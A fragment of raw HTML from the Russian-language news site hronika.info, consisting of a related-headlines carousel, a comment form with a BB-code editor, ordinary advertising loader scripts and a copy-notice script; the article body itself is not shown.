</a>
<strong class="ttl" title="Отличные анекдоты для позитивного начала недели"><a href="http://hronika.info/kurjozy/336137-otlichnye-anekdoty-dlya-pozitivnogo-nachala-nedeli.html">Отличные анекдоты для позитивного начала недели</a></strong>
</li><li class="listalkafull_n">
    <a href="http://hronika.info/kurjozy/336128-prikolnye-fotki-lyudey-kotoryh-nevozmozhno-vyvesti-iz-sebya.html"><img src="/posters/167_120_50_1/uploads/posts/2018-07/thumbs/1532353253_nevozmutimye.jpg" alt="Прикольные фотки людей, которых невозможно вывести из себя" class="l_n_im" title="Прикольные фотки людей, которых невозможно вывести из себя" />
</a>
<strong class="ttl" title="Прикольные фотки людей, которых невозможно вывести из себя"><a href="http://hronika.info/kurjozy/336128-prikolnye-fotki-lyudey-kotoryh-nevozmozhno-vyvesti-iz-sebya.html">Прикольные фотки людей, которых невозможно вывести из себя</a></strong>
</li><li class="listalkafull_n">
    <a href="http://hronika.info/kurjozy/336127-umoritelnye-fotki-sposobnye-s-legkostyu-obmanut-zrenie.html"><img src="/posters/167_120_50_1/uploads/posts/2018-07/thumbs/1532352961_obman-zreniya2.jpg" alt="Уморительные фотки, способные с легкостью обмануть зрение" class="l_n_im" title="Уморительные фотки, способные с легкостью обмануть зрение" />
</a>
<strong class="ttl" title="Уморительные фотки, способные с легкостью обмануть зрение"><a href="http://hronika.info/kurjozy/336127-umoritelnye-fotki-sposobnye-s-legkostyu-obmanut-zrenie.html">Уморительные фотки, способные с легкостью обмануть зрение</a></strong>
</li><li class="listalkafull_n">
    <a href="http://hronika.info/kurjozy/336121-eti-lyudi-dokazali-chto-zabavnye-neozhidannosti-podsteregayut-nas-na-kazhdom-shagu.html"><img src="/posters/167_120_50_1/uploads/posts/2018-07/thumbs/1532351679_podvoh5.jpg" alt="Эти люди доказали, что забавные неожиданности подстерегают нас на каждом шагу" class="l_n_im" title="Эти люди доказали, что забавные неожиданности подстерегают нас на каждом шагу" />
</a>
<strong class="ttl" title="Эти люди доказали, что забавные неожиданности подстерегают нас на каждом шагу"><a href="http://hronika.info/kurjozy/336121-eti-lyudi-dokazali-chto-zabavnye-neozhidannosti-podsteregayut-nas-na-kazhdom-shagu.html">Эти люди доказали, что забавные неожиданности подстерегают нас на каждом шагу</a></strong>
</li><li class="listalkafull_n">
    <a href="http://hronika.info/kurjozy/336120-nelepye-fotki-sposobnye-vyzvat-moroz-po-kozhe-dazhe-v-zharu.html"><img src="/posters/167_120_50_1/uploads/posts/2018-07/thumbs/1532351343_moroz-po-kozhe2.jpg" alt="Нелепые фотки, способные вызвать «мороз по коже» даже в жару" class="l_n_im" title="Нелепые фотки, способные вызвать «мороз по коже» даже в жару" />
</a>
<strong class="ttl" title="Нелепые фотки, способные вызвать «мороз по коже» даже в жару"><a href="http://hronika.info/kurjozy/336120-nelepye-fotki-sposobnye-vyzvat-moroz-po-kozhe-dazhe-v-zharu.html">Нелепые фотки, способные вызвать «мороз по коже» даже в жару</a></strong>
</li><li class="listalkafull_n">
    <a href="http://hronika.info/kurjozy/336155-vse-vklyucheno-po-rossiyski-set-nasmeshilo-video-snyatoe-na-kurorte-v-rf.html"><img src="/posters/167_120_50_1/uploads/posts/2018-07/thumbs/1532356961_kurort.jpg" alt="Все включено по-российски: Сеть насмешило видео, снятое на курорте в РФ" class="l_n_im" title="Все включено по-российски: Сеть насмешило видео, снятое на курорте в РФ" />
</a>
<strong class="ttl" title="Все включено по-российски: Сеть насмешило видео, снятое на курорте в РФ"><a href="http://hronika.info/kurjozy/336155-vse-vklyucheno-po-rossiyski-set-nasmeshilo-video-snyatoe-na-kurorte-v-rf.html">Все включено по-российски: Сеть насмешило видео, снятое на курорте в РФ</a></strong>
</li><li class="listalkafull_n">
    <a href="http://hronika.info/kurjozy/336143-ocherednoy-potop-v-kieve-vysmeyali-metkoy-fotozhaboy.html"><img src="/posters/167_120_50_1/uploads/posts/2018-07/thumbs/1532355433_potop2.jpg" alt="Очередной потоп в Киеве высмеяли меткой фотожабой" class="l_n_im" title="Очередной потоп в Киеве высмеяли меткой фотожабой" />
</a>
<strong class="ttl" title="Очередной потоп в Киеве высмеяли меткой фотожабой"><a href="http://hronika.info/kurjozy/336143-ocherednoy-potop-v-kieve-vysmeyali-metkoy-fotozhaboy.html">Очередной потоп в Киеве высмеяли меткой фотожабой</a></strong>
</li><li class="listalkafull_n">
    <a href="http://hronika.info/kurjozy/336126-v-seti-otyskali-koshku-ugodivshuyu-na-panoramu-google.html"><img src="/posters/167_120_50_1/uploads/posts/2018-07/thumbs/1532352755_koshka.jpg" alt="В Сети отыскали кошку, угодившую на панораму Google" class="l_n_im" title="В Сети отыскали кошку, угодившую на панораму Google" />
</a>
<strong class="ttl" title="В Сети отыскали кошку, угодившую на панораму Google"><a href="http://hronika.info/kurjozy/336126-v-seti-otyskali-koshku-ugodivshuyu-na-panoramu-google.html">В Сети отыскали кошку, угодившую на панораму Google</a></strong>
</li><li class="listalkafull_n">
    <a href="http://hronika.info/kurjozy/336111-set-nasmeshila-ovcharka-ne-sumevshaya-nayti-v-komnate-hozyaina.html"><img src="/posters/167_120_50_1/uploads/posts/2018-07/thumbs/1532350399_sobaka.jpg" alt="Сеть насмешила овчарка, не сумевшая найти в комнате хозяина" class="l_n_im" title="Сеть насмешила овчарка, не сумевшая найти в комнате хозяина" />
</a>
<strong class="ttl" title="Сеть насмешила овчарка, не сумевшая найти в комнате хозяина"><a href="http://hronika.info/kurjozy/336111-set-nasmeshila-ovcharka-ne-sumevshaya-nayti-v-komnate-hozyaina.html">Сеть насмешила овчарка, не сумевшая найти в комнате хозяина</a></strong>
</li><li class="listalkafull_n">
    <a href="http://hronika.info/ukraina/336104-stalo-izvestno-zachem-boeviki-proveryali-avtobusy-v-donbasse.html"><img src="/posters/167_120_50_1/uploads/posts/2018-07/thumbs/1532348928_avtobusy.jpg" alt="Стало известно, зачем боевики проверяли автобусы в Донбассе" class="l_n_im" title="Стало известно, зачем боевики проверяли автобусы в Донбассе" />
</a>
<strong class="ttl" title="Стало известно, зачем боевики проверяли автобусы в Донбассе"><a href="http://hronika.info/ukraina/336104-stalo-izvestno-zachem-boeviki-proveryali-avtobusy-v-donbasse.html">Стало известно, зачем боевики проверяли автобусы в Донбассе</a></strong>
</li><li class="listalkafull_n">
    <a href="http://hronika.info/kurjozy/336101-zhiteley-san-francisko-nasmeshil-naduvnoy-cyplenok-pohozhiy-na-trampa.html"><img src="/posters/167_120_50_1/uploads/posts/2018-07/1532347903_tramp.jpeg" alt="Жителей Сан-Франциско насмешил надувной цыпленок, похожий на Трампа" class="l_n_im" title="Жителей Сан-Франциско насмешил надувной цыпленок, похожий на Трампа" />
</a>
<strong class="ttl" title="Жителей Сан-Франциско насмешил надувной цыпленок, похожий на Трампа"><a href="http://hronika.info/kurjozy/336101-zhiteley-san-francisko-nasmeshil-naduvnoy-cyplenok-pohozhiy-na-trampa.html">Жителей Сан-Франциско насмешил надувной цыпленок, похожий на Трампа</a></strong>
</li><li class="listalkafull_n">
    <a href="http://hronika.info/kurjozy/336089-v-anglii-golodnyy-pes-ostavil-semyu-bez-otpuska.html"><img src="/posters/167_120_50_1/uploads/posts/2018-07/thumbs/1532345703_otpusk3.jpg" alt="В Англии голодный пес оставил семью без отпуска" class="l_n_im" title="В Англии голодный пес оставил семью без отпуска" />
</a>
<strong class="ttl" title="В Англии голодный пес оставил семью без отпуска"><a href="http://hronika.info/kurjozy/336089-v-anglii-golodnyy-pes-ostavil-semyu-bez-otpuska.html">В Англии голодный пес оставил семью без отпуска</a></strong>
</li><li class="listalkafull_n">
    <a href="http://hronika.info/kurjozy/336078-set-v-vostorge-ot-parodii-na-klip-monatika-i-nadi-dorofeevoy.html"><img src="/posters/167_120_50_1/uploads/posts/2018-07/thumbs/1532344081_duet.jpg" alt="Сеть в восторге от пародии на клип Монатика и Нади Дорофеевой" class="l_n_im" title="Сеть в восторге от пародии на клип Монатика и Нади Дорофеевой" />
</a>
<strong class="ttl" title="Сеть в восторге от пародии на клип Монатика и Нади Дорофеевой"><a href="http://hronika.info/kurjozy/336078-set-v-vostorge-ot-parodii-na-klip-monatika-i-nadi-dorofeevoy.html">Сеть в восторге от пародии на клип Монатика и Нади Дорофеевой</a></strong>
</li><li class="listalkafull_n">
    <a href="http://hronika.info/ukraina/336059-v-odesskiy-port-zashli-korabli-nato.html"><img src="/posters/167_120_50_1/uploads/posts/2018-07/thumbs/1532340467_nato-1.jpeg" alt="В Одесский порт зашли корабли НАТО" class="l_n_im" title="В Одесский порт зашли корабли НАТО" />
</a>
<strong class="ttl" title="В Одесский порт зашли корабли НАТО"><a href="http://hronika.info/ukraina/336059-v-odesskiy-port-zashli-korabli-nato.html">В Одесский порт зашли корабли НАТО</a></strong>
</li><li class="listalkafull_n">
    <a href="http://hronika.info/kurjozy/336058-pod-odessoy-beglye-obezyany-ustroili-perepoloh.html"><img src="/posters/167_120_50_1/uploads/posts/2018-07/thumbs/1532340679_obezyany.jpg" alt="Под Одессой беглые обезьяны устроили переполох" class="l_n_im" title="Под Одессой беглые обезьяны устроили переполох" />
</a>
<strong class="ttl" title="Под Одессой беглые обезьяны устроили переполох"><a href="http://hronika.info/kurjozy/336058-pod-odessoy-beglye-obezyany-ustroili-perepoloh.html">Под Одессой беглые обезьяны устроили переполох</a></strong>
</li><li class="listalkafull_n">
    <a href="http://hronika.info/ukraina/336043-marshrutka-v-kotoroy-pogibli-10-chelovek-byla-neispravnoy.html"><img src="/posters/167_120_50_1/uploads/posts/2018-07/thumbs/1532337595_dtp.jpg" alt="Маршрутка, в которой погибли 10 человек, была неисправной" class="l_n_im" title="Маршрутка, в которой погибли 10 человек, была неисправной" />
</a>
<strong class="ttl" title="Маршрутка, в которой погибли 10 человек, была неисправной"><a href="http://hronika.info/ukraina/336043-marshrutka-v-kotoroy-pogibli-10-chelovek-byla-neispravnoy.html">Маршрутка, в которой погибли 10 человек, была неисправной</a></strong>
</li><li class="listalkafull_n">
    <a href="http://hronika.info/kurjozy/336052-socseti-posmeyalis-nad-nelepym-dtp-s-uchastiem-policeyskih-v-kieve.html"><img src="/posters/167_120_50_1/uploads/posts/2018-07/thumbs/1532339006_dtp2.jpg" alt="Соцсети посмеялись над нелепым ДТП с участием полицейских в Киеве" class="l_n_im" title="Соцсети посмеялись над нелепым ДТП с участием полицейских в Киеве" />
</a>
<strong class="ttl" title="Соцсети посмеялись над нелепым ДТП с участием полицейских в Киеве"><a href="http://hronika.info/kurjozy/336052-socseti-posmeyalis-nad-nelepym-dtp-s-uchastiem-policeyskih-v-kieve.html">Соцсети посмеялись над нелепым ДТП с участием полицейских в Киеве</a></strong>
</li><li class="listalkafull_n">
    <a href="http://hronika.info/ukraina/336031-chlen-kazachestva-dnr-pytalsya-podkupit-pogranichnikov.html"><img src="/posters/167_120_50_1/uploads/posts/2018-07/thumbs/1532335528_dnr.jpg" alt="Член «казачества ДНР» пытался подкупить пограничников" class="l_n_im" title="Член «казачества ДНР» пытался подкупить пограничников" />
</a>
<strong class="ttl" title="Член «казачества ДНР» пытался подкупить пограничников"><a href="http://hronika.info/ukraina/336031-chlen-kazachestva-dnr-pytalsya-podkupit-pogranichnikov.html">Член «казачества ДНР» пытался подкупить пограничников</a></strong>
</li><li class="listalkafull_n">
    <a href="http://hronika.info/kurjozy/336032-na-starinnoy-statue-razglyadeli-devochku-s-noutbukom.html"><img src="/posters/167_120_50_1/uploads/posts/2018-07/thumbs/1532336024_nout.jpeg" alt="На старинной статуе разглядели девочку с ноутбуком" class="l_n_im" title="На старинной статуе разглядели девочку с ноутбуком" />
</a>
<strong class="ttl" title="На старинной статуе разглядели девочку с ноутбуком"><a href="http://hronika.info/kurjozy/336032-na-starinnoy-statue-razglyadeli-devochku-s-noutbukom.html">На старинной статуе разглядели девочку с ноутбуком</a></strong>
</li><li class="listalkafull_n">
    <a href="http://hronika.info/ukraina/336012-geraschenko-rasskazala-o-zverstvah-v-ldnr.html"><img src="/posters/167_120_50_1/uploads/posts/2018-07/thumbs/1532331395_pytki.jpeg" alt="Геращенко рассказала о зверствах в «ЛДНР»" class="l_n_im" title="Геращенко рассказала о зверствах в «ЛДНР»" />
</a>
<strong class="ttl" title="Геращенко рассказала о зверствах в «ЛДНР»"><a href="http://hronika.info/ukraina/336012-geraschenko-rasskazala-o-zverstvah-v-ldnr.html">Геращенко рассказала о зверствах в «ЛДНР»</a></strong>
</li><li class="listalkafull_n">
    <a href="http://hronika.info/kurjozy/336015-set-v-vostorge-ot-sobaki-poklonnicy-britni-spirs.html"><img src="/posters/167_120_50_1/uploads/posts/2018-07/thumbs/1532332251_sobaki.png" alt="Сеть в восторге от собаки-поклонницы Бритни Спирс" class="l_n_im" title="Сеть в восторге от собаки-поклонницы Бритни Спирс" />
</a>
<strong class="ttl" title="Сеть в восторге от собаки-поклонницы Бритни Спирс"><a href="http://hronika.info/kurjozy/336015-set-v-vostorge-ot-sobaki-poklonnicy-britni-spirs.html">Сеть в восторге от собаки-поклонницы Бритни Спирс</a></strong>
</li><li class="listalkafull_n">
    <a href="http://hronika.info/ukraina/336001-na-luganschine-bez-elektroenergii-ostalis-tysyachi-lyudey.html"><img src="/posters/167_120_50_1/uploads/posts/2018-07/thumbs/1532329789_elektrichestvo.jpg" alt="На Луганщине без электроэнергии остались тысячи людей" class="l_n_im" title="На Луганщине без электроэнергии остались тысячи людей" />
</a>
<strong class="ttl" title="На Луганщине без электроэнергии остались тысячи людей"><a href="http://hronika.info/ukraina/336001-na-luganschine-bez-elektroenergii-ostalis-tysyachi-lyudey.html">На Луганщине без электроэнергии остались тысячи людей</a></strong>
</li><li class="listalkafull_n">
    <a href="http://hronika.info/kurjozy/336011-v-ssha-devushka-na-neskolko-minut-stala-millionershey.html"><img src="/posters/167_120_50_1/uploads/posts/2018-07/thumbs/1532331471_millionersha.jpg" alt="В США девушка на несколько минут стала миллионершей" class="l_n_im" title="В США девушка на несколько минут стала миллионершей" />
</a>
<strong class="ttl" title="В США девушка на несколько минут стала миллионершей"><a href="http://hronika.info/kurjozy/336011-v-ssha-devushka-na-neskolko-minut-stala-millionershey.html">В США девушка на несколько минут стала миллионершей</a></strong>
</li><li class="listalkafull_n">
    <a href="http://hronika.info/kurjozy/335991-ukrainskie-kommunalschiki-nasmeshili-novym-sposobom-remonta-dorog.html"><img src="/posters/167_120_50_1/uploads/posts/2018-07/thumbs/1532328930_dorogi.jpg" alt="Украинские коммунальщики насмешили новым способом ремонта дорог" class="l_n_im" title="Украинские коммунальщики насмешили новым способом ремонта дорог" />
</a>
<strong class="ttl" title="Украинские коммунальщики насмешили новым способом ремонта дорог"><a href="http://hronika.info/kurjozy/335991-ukrainskie-kommunalschiki-nasmeshili-novym-sposobom-remonta-dorog.html">Украинские коммунальщики насмешили новым способом ремонта дорог</a></strong>
</li><li class="listalkafull_n">
    <a href="http://hronika.info/kurjozy/335979-porciya-pozitiva-luchshie-anekdoty-na-utro-ponedelnika.html"><img src="/posters/167_120_50_1/uploads/posts/2018-07/thumbs/1532327597_anekdoty.jpg" alt="Порция позитива: лучшие анекдоты на утро понедельника" class="l_n_im" title="Порция позитива: лучшие анекдоты на утро понедельника" />
</a>
<strong class="ttl" title="Порция позитива: лучшие анекдоты на утро понедельника"><a href="http://hronika.info/kurjozy/335979-porciya-pozitiva-luchshie-anekdoty-na-utro-ponedelnika.html">Порция позитива: лучшие анекдоты на утро понедельника</a></strong>
</li><li class="listalkafull_n">
    <a href="http://hronika.info/ukraina/335970-na-donbasse-ranen-odin-ukrainskiy-voennyy.html"><img src="/posters/167_120_50_1/uploads/posts/2018-07/thumbs/1532326046_oos.jpg" alt="На Донбассе ранен один украинский военный" class="l_n_im" title="На Донбассе ранен один украинский военный" />
</a>
<strong class="ttl" title="На Донбассе ранен один украинский военный"><a href="http://hronika.info/ukraina/335970-na-donbasse-ranen-odin-ukrainskiy-voennyy.html">На Донбассе ранен один украинский военный</a></strong>
</li><li class="listalkafull_n">
    <a href="http://hronika.info/kurjozy/335876-zabavnye-fotki-zhivotnyh-obozhayuschih-leto.html"><img src="/posters/167_120_50_1/uploads/posts/2018-07/thumbs/1532269755_leto.jpg" alt="Забавные фотки животных, обожающих лето" class="l_n_im" title="Забавные фотки животных, обожающих лето" />
</a>
<strong class="ttl" title="Забавные фотки животных, обожающих лето"><a href="http://hronika.info/kurjozy/335876-zabavnye-fotki-zhivotnyh-obozhayuschih-leto.html">Забавные фотки животных, обожающих лето</a></strong>
</li><li class="listalkafull_n">
    <a href="http://hronika.info/kurjozy/335875-paren-prevraschaet-oblozhki-muzykalnyh-albomov-v-zabavnye-fotki.html"><img src="/posters/167_120_50_1/uploads/posts/2018-07/thumbs/1532269372_albomy.jpg" alt="Парень превращает обложки музыкальных альбомов в забавные фотки" class="l_n_im" title="Парень превращает обложки музыкальных альбомов в забавные фотки" />
</a>
<strong class="ttl" title="Парень превращает обложки музыкальных альбомов в забавные фотки"><a href="http://hronika.info/kurjozy/335875-paren-prevraschaet-oblozhki-muzykalnyh-albomov-v-zabavnye-fotki.html">Парень превращает обложки музыкальных альбомов в забавные фотки</a></strong>
</li></ul>
        </div>
        <a class="buttons next" href="#"></a> 
      </div>
    </div>
</div>

<br />
<div id="comments_tab"><b>Оставьте свой комментарий</b>
<!--  <ul class="tabs">
  <li>
    <a href="#hronika">Хроника</a>
  </li>
<li>
    <a href="#vkontakte">Вконтакте</a>
  </li> 
  <li>
    <a href="#facebook">Фейсбук</a>
  </li>
</ul> -->
<div class="clr">
  <div id="hronika">
<form  method="post" name="dle-comments-form" id="dle-comments-form" action="/mir/336219-v-turcii-proshli-massovye-oblavy-na-boevikov-igil.html"><br />
<div class="baseform addcomfrm">
	<table class="tableform">
		
		<tr>
			<td class="label">
				Имя:<span class="impot">*&nbsp;&nbsp;</span>
				<input type="text" name="name" id="name" class="f_input" />
			</td>
		</tr>
		<tr>	
			<td class="label">E-Mail:<input type="text" name="mail" id="mail" class="f_input" style="margin-left:8px" /></td>
		</tr>
		
		<tr>	
			<td class="editorcomm"><script type="text/javascript">
<!--
var text_enter_url       = "Введите полный URL ссылки";
var text_enter_size       = "Введите размеры флэш ролика (ширина, высота)";
var text_enter_flash       = "Введите ссылку на флэш ролик";
var text_enter_page      = "Введите номер страницы";
var text_enter_url_name  = "Введите описание ссылки";
var text_enter_page_name = "Введите описание ссылки";
var text_enter_image    = "Введите полный URL изображения";
var text_enter_email    = "Введите e-mail адрес";
var text_code           = "Использование: [CODE] Здесь Ваш код.. [/CODE]";
var text_quote          = "Использование: [QUOTE] Здесь Ваша Цитата.. [/QUOTE]";
var text_upload         = "Загрузка файлов и изображений на сервер";
var error_no_url        = "Вы должны ввести URL";
var error_no_title      = "Вы должны ввести название";
var error_no_email      = "Вы должны ввести e-mail адрес";
var prompt_start        = "Введите текст для форматирования";
var img_title   		= "Введите по какому краю выравнивать картинку (left, center, right)";
var email_title  	    = "Введите описание ссылки";
var text_pages  	    = "Страница";
var image_align  	    = "left";
var bb_t_emo  	        = "Вставка смайликов";
var bb_t_col  	        = "Цвет:";
var text_enter_list     = "Введите пункт списка. Для завершения ввода оставьте поле пустым.";
var text_alt_image      = "Введите описание изображения";
var img_align  	        = "Выравнивание";
var img_align_sel  	    = "<select name='dleimagealign' id='dleimagealign' class='ui-widget-content ui-corner-all'><option value='' >Нет</option><option value='left' selected>По левому краю</option><option value='right' >По правому краю</option><option value='center' >По центру</option></select>";

var selField  = "comments";
var fombj    = document.getElementById( 'dle-comments-form' );
-->
</script>
<div class="bb-editor">
<div class="bb-pane" onmouseenter="if(is_ie9) get_sel(eval('fombj.'+ selField));">
<b id="b_b" class="bb-btn" onclick="simpletag('b')" title="Полужирный">Полужирный</b>
<b id="b_i" class="bb-btn" onclick="simpletag('i')" title="Наклонный текст">Наклонный текст</b>
<b id="b_u" class="bb-btn" onclick="simpletag('u')" title="Подчёркнутый текст">Подчёркнутый текст</b>
<b id="b_s" class="bb-btn" onclick="simpletag('s')" title="Зачёркнутый текст">Зачёркнутый текст</b>
<span class="bb-sep">|</span>
<b id="b_left" class="bb-btn" onclick="simpletag('left')" title="Выравнивание по левому краю">Выравнивание по левому краю</b>
<b id="b_center" class="bb-btn" onclick="simpletag('center')" title="По центру">По центру</b>
<b id="b_right" class="bb-btn" onclick="simpletag('right')" title="Выравнивание по правому краю">Выравнивание по правому краю</b>
<span class="bb-sep">|</span>
<b id="b_emo" class="bb-btn" onclick="ins_emo(this)" title="Вставка смайликов">Вставка смайликов</b>


<b id="b_color" class="bb-btn" onclick="ins_color(this)" title="Выбор цвета">Выбор цвета</b>
<span class="bb-sep">|</span>
<b id="b_hide" class="bb-btn" onclick="simpletag('hide')" title="Скрытый текст">Скрытый текст</b>
<b id="b_quote" class="bb-btn" onclick="simpletag('quote')" title="Вставка цитаты">Вставка цитаты</b>
<b id="b_tnl" class="bb-btn" onclick="translit()" title="Преобразовать выбранный текст из транслитерации в кириллицу">Преобразовать выбранный текст из транслитерации в кириллицу</b>
<b id="b_spoiler" class="bb-btn" onclick="simpletag('spoiler')" title="Вставка спойлера">Вставка спойлера</b>
</div>
<div id="dle_emos" style="display: none;" title="Вставка смайликов"><div style="width:100%;height:100%;overflow: auto;"><table cellpadding="0" cellspacing="0" border="0" width="100%"><tr><td style="padding:2px;" align="center"><a href="#" onclick="dle_smiley(':wink:'); return false;"><img style="border: none;" alt="wink" src="http://hronika.info/engine/data/emoticons/wink.gif" /></a></td><td style="padding:2px;" align="center"><a href="#" onclick="dle_smiley(':winked:'); return false;"><img style="border: none;" alt="winked" src="http://hronika.info/engine/data/emoticons/winked.gif" /></a></td><td style="padding:2px;" align="center"><a href="#" onclick="dle_smiley(':smile:'); return false;"><img style="border: none;" alt="smile" src="http://hronika.info/engine/data/emoticons/smile.gif" /></a></td><td style="padding:2px;" align="center"><a href="#" onclick="dle_smiley(':am:'); return false;"><img style="border: none;" alt="am" src="http://hronika.info/engine/data/emoticons/am.gif" /></a></td></tr><tr><td style="padding:2px;" align="center"><a href="#" onclick="dle_smiley(':belay:'); return false;"><img style="border: none;" alt="belay" src="http://hronika.info/engine/data/emoticons/belay.gif" /></a></td><td style="padding:2px;" align="center"><a href="#" onclick="dle_smiley(':feel:'); return false;"><img style="border: none;" alt="feel" src="http://hronika.info/engine/data/emoticons/feel.gif" /></a></td><td style="padding:2px;" align="center"><a href="#" onclick="dle_smiley(':fellow:'); return false;"><img style="border: none;" alt="fellow" src="http://hronika.info/engine/data/emoticons/fellow.gif" /></a></td><td style="padding:2px;" align="center"><a href="#" onclick="dle_smiley(':laughing:'); return false;"><img style="border: none;" alt="laughing" src="http://hronika.info/engine/data/emoticons/laughing.gif" /></a></td></tr><tr><td style="padding:2px;" align="center"><a href="#" onclick="dle_smiley(':lol:'); return false;"><img style="border: none;" alt="lol" src="http://hronika.info/engine/data/emoticons/lol.gif" /></a></td><td style="padding:2px;" align="center"><a href="#" onclick="dle_smiley(':love:'); return false;"><img style="border: none;" alt="love" src="http://hronika.info/engine/data/emoticons/love.gif" /></a></td><td style="padding:2px;" align="center"><a href="#" onclick="dle_smiley(':no:'); return false;"><img style="border: none;" alt="no" src="http://hronika.info/engine/data/emoticons/no.gif" /></a></td><td style="padding:2px;" align="center"><a href="#" onclick="dle_smiley(':recourse:'); return false;"><img style="border: none;" alt="recourse" src="http://hronika.info/engine/data/emoticons/recourse.gif" /></a></td></tr><tr><td style="padding:2px;" align="center"><a href="#" onclick="dle_smiley(':request:'); return false;"><img style="border: none;" alt="request" src="http://hronika.info/engine/data/emoticons/request.gif" /></a></td><td style="padding:2px;" align="center"><a href="#" onclick="dle_smiley(':sad:'); return false;"><img style="border: none;" alt="sad" src="http://hronika.info/engine/data/emoticons/sad.gif" /></a></td><td style="padding:2px;" align="center"><a href="#" onclick="dle_smiley(':tongue:'); return false;"><img style="border: none;" alt="tongue" src="http://hronika.info/engine/data/emoticons/tongue.gif" /></a></td><td style="padding:2px;" align="center"><a href="#" onclick="dle_smiley(':wassat:'); return false;"><img style="border: none;" alt="wassat" src="http://hronika.info/engine/data/emoticons/wassat.gif" /></a></td></tr><tr><td style="padding:2px;" align="center"><a href="#" onclick="dle_smiley(':crying:'); return false;"><img style="border: none;" alt="crying" src="http://hronika.info/engine/data/emoticons/crying.gif" /></a></td><td style="padding:2px;" align="center"><a href="#" onclick="dle_smiley(':what:'); return false;"><img style="border: none;" alt="what" src="http://hronika.info/engine/data/emoticons/what.gif" /></a></td><td style="padding:2px;" align="center"><a href="#" onclick="dle_smiley(':bully:'); return false;"><img style="border: none;" alt="bully" src="http://hronika.info/engine/data/emoticons/bully.gif" /></a></td><td style="padding:2px;" align="center"><a href="#" onclick="dle_smiley(':angry:'); return false;"><img style="border: none;" alt="angry" src="http://hronika.info/engine/data/emoticons/angry.gif" /></a></td></tr></table></div></div>
<textarea name="comments" id="comments" cols="70" rows="10" onfocus="setNewField(this.name, document.getElementById( 'dle-comments-form' ))"></textarea>
</div></td>
		</tr>
			
			
		<tr>		
			<td class="label">Введите код: <span class="impot">*</span></td>	
			<td>	
				<div><span id="dle-captcha"><img src="/engine/modules/antibot/antibot.php" alt="Включите эту картинку для отображения кода безопасности" width="160" height="80" /><br /><a onclick="reload(); return false;" href="#">обновить, если не виден код</a></span></div>	
				<div><input type="text" name="sec_code" id="sec_code" style="width:115px" class="f_input" /></div>
			</td>	
		</tr>	
			
			
	</table>
	<br />
</div>
	<div class="fieldsubmit" style=" position: relative; width: 100%; height: 23px; top: -10px; ">	
		<button type="submit" name="submit" class="fbutton addcombut"><span>Добавить</span></button>
	</div>

		<input type="hidden" name="subaction" value="addcomment" />
		<input type="hidden" name="post_id" id="post_id" value="336219" /></form><script type="text/javascript">
<!--
$(function(){

	$('#dle-comments-form').submit(function() {
	  doAddComments();
	  return false;
	});

});

function reload () {

	var rndval = new Date().getTime(); 

	document.getElementById('dle-captcha').innerHTML = '<img src="/engine/modules/antibot/antibot.php?rndval=' + rndval + '" width="160" height="80" alt="" /><br /><a onclick="reload(); return false;" href="#">обновить, если не виден код</a>';

};
//-->
</script>
  </div>

  <!--
  <div id="vkontakte">


<script type="text/javascript" src="//vk.com/js/api/openapi.js?98"></script>

<script type="text/javascript">
  VK.init({apiId: 3098550, onlyWidgets: true});
</script>


<div id="vk_comments"></div>
<script type="text/javascript">
VK.Widgets.Comments("vk_comments", {limit: 10, width: "100%", attach: "*"});
</script>
      
  </div>
  <div id="facebook">
<div class="fb-comments" data-href="http://hronika.info/mir/336219-v-turcii-proshli-massovye-oblavy-na-boevikov-igil.html" data-width="410"></div>      
  </div>
  -->
  </div> 
</div>
 
<div id="dle-ajax-comments"></div>

<!--dlenavigationcomments-->
<div class="clr"><br /></div>
</div>
<div id='_mwayss-13a2bf393830a24cb00f9b493f869072'></div>
                <script>      
                    (function(window, document, undefined) {
                        var script_tag = document.createElement('script');
                        script_tag.src = 'https://ad.mediawayss.com/ad/mwayss_invocation.min.js?pzoneid=1171&height=288&width=512&tld=hronika.info&ctype=div&ch=DOMAIN_HERE';
                        var container = document.getElementById('_mwayss-13a2bf393830a24cb00f9b493f869072');    
                        container.parentNode.insertBefore(script_tag, container);
                    })(window, document);
                </script>
<script>
$.ctrl = function(key, callback, args) {
    var isCtrl = false;
    $(document).keydown(function(e) {
        if(!args) args=[]; 
        isCtrl = e.ctrlKey;
        if((e.keyCode == key.charCodeAt(0) || e.keyCode == 45) && isCtrl) callback.apply(this, args);
    }).keyup(function(e) {
        if(e.ctrlKey) isCtrl = false;
    });        
};
$.ctrl('C', function() {
    $('body').prepend("<div id='ctrl_c' class='ctrl_c' align='justify'><span>&times;</span>Использование материалов и новостей с сайта <a style='font-size: 11px;' href='http://hronika.info'>hronika.info</a> разрешается только при условии размещения прямой, открытой для поисковых систем, гиперссылки на опубликованную или цитируемую новость.</div>");
    $("#ctrl_c > span").click( function() { $("#ctrl_c").remove(); });

	
ns4 = (document.layers)? true:false
ie4 = (document.all)? true:false

function mousemove(event) {
        var mouse_x = y = 0;
    if (document.attachEvent != null) {
        mouse_x = window.event.clientX;
        mouse_y = window.event.clientY;
    } else if (!document.attachEvent && document.addEventListener) {
        mouse_x = event.clientX;
        mouse_y = event.clientY;
    }
    
}

    document.onmousemove=mousemove;

});

$(document).ready(function(){
var fimg=$(".ax-full img").first();
fimg.css({"width":"200px","height":"150px"});
});
</script>
</div></article>
            </div>
          </div>

             <aside id="sideRight2"><!---->

         <!-- 
		 <div class="wrap"> 
         	
         -->

<div class="row-600">
    <div class="col-336">
        <script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>
<ins class="adsbygoogle"
     style="display:inline-block;width:336px;height:280px"
     data-ad-client="ca-pub-9393887096432784"
     data-ad-slot="3119660949"></ins>
<script>
(adsbygoogle = window.adsbygoogle || []).push({});
</script>
    </div>
    <div class="col-260">
       <!-- Асинхронный код информера news.2xclick.ru -->
<div id="gnezdo_ru_10484">Загрузка...</div>
<script language='JavaScript'>
	var s = document.createElement("script"),
	f = function(){ document.getElementsByTagName("head")[0].appendChild(s); };
	s.type = "text/javascript";
	s.async = true;
	s.src = '//news.2xclick.ru/show/10484/block_a.js';
	if (window.opera == "[object Opera]") {
		document.addEventListener("DOMContentLoaded", f);
	} else { f(); }
</script>
<!-- Конец кода информера news.2xclick.ru -->
        
    </div>
</div>



<div class="clr"></div>

<div class="width49-4 fleft">  
            <div class="wrap">
            <!-- Асинхронный код информера news.2xclick.ru -->
<div id="gnezdo_ru_10493">Загрузка...</div>
<script language='JavaScript'>
	var s = document.createElement("script"),
	f = function(){ document.getElementsByTagName("head")[0].appendChild(s); };
	s.type = "text/javascript";
	s.async = true;
	s.src = '//news.2xclick.ru/show/10493/block_a.js';
